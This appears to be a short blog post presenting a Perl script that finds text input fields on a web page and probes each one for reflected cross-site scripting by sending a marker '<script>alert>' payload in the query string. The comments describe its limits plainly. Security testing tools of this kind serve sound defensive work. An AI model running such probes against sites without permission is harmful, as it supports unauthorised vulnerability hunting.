Today I wrote a simple Perl script to automatically discover XSS vulnerabilities in a web application.
The code follows:
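#!/usr/bin/perl
# Reflected-XSS smoke test.
#
# Fetches http://<url>, collects the names of its text inputs, then requests
# the same URL once per name with a marker <script> payload in the query
# string and reports whether the marker comes back unmodified in the body.
#
# Limits of the check (read the output accordingly):
#   - Only inputs written exactly as <input type="text" name="..."> are
#     found; other attribute orders or quoting styles are missed.
#   - Only GET parameters on the fetched URL are exercised. Form action
#     targets and POST submissions are not followed.
#   - The verdict is a plain substring match on the response. A verbatim echo
#     is a strong hint that output encoding is missing, but the script does
#     not look at where in the document the echo lands. No echo only means
#     this one payload was not reflected as-is; it is not evidence that the
#     parameter is safe.
use strict;
use warnings;
use LWP::Simple;

my ($url, $webpage, @webpage, @name, $result);

if (@ARGV < 1) {
    usage();
}

$url = "http://" . $ARGV[0];

# Get web page specified by cmd
$webpage = get($url);

# LWP::Simple::get returns undef when the request fails. Without this check a
# failed fetch would be reported as "no search boxes found".
if (!defined $webpage) {
    die "Could not fetch $url\n";
}

# Split the page into an array of lines
@webpage = split(/\n/, $webpage);

# Parse the page to obtain the names of "input type=text" fields
foreach my $line (@webpage) {
    if ($line =~ /input\stype="text"\sname="(\w{1,30})"/) {
        push(@name, $1);
    }
}

# Print found search boxes
if (@name) {
    print "I've found the following search box:\n";
    foreach my $field (@name) {
        print "$field\n";
    }
    print "and I've discovered that:\n";

    # Request the page once per field with the marker payload and look for a
    # verbatim echo of it in the response.
    foreach my $field (@name) {
        $result = get($url . "?" . $field . "=<script>alert('test_XSS')</script>");

        if (!defined $result) {
            # A failed request says nothing about the field; do not report it
            # as "isn't vulnerable".
            print "$field could not be tested (request failed)\n";
        }
        elsif ($result =~ /<script>alert\('test_XSS'\)<\/script>/) {
            print "$field is vulnerable to XSS\n";
        }
        else {
            print "$field isn't vulnerable to XSS\n";
        }
    }
}
else {
    print "I have not found search boxes in " . $ARGV[0] . "\n";
}

# Print the command-line synopsis and exit.
# Declared without a prototype: it is called above, before this definition
# is seen, so a prototype could not be checked anyway.
sub usage {
    print "Usage: " . $0 . " <url>\n";
    print "Example: " . $0 . " ivanobinetti.com\n";
    exit;
}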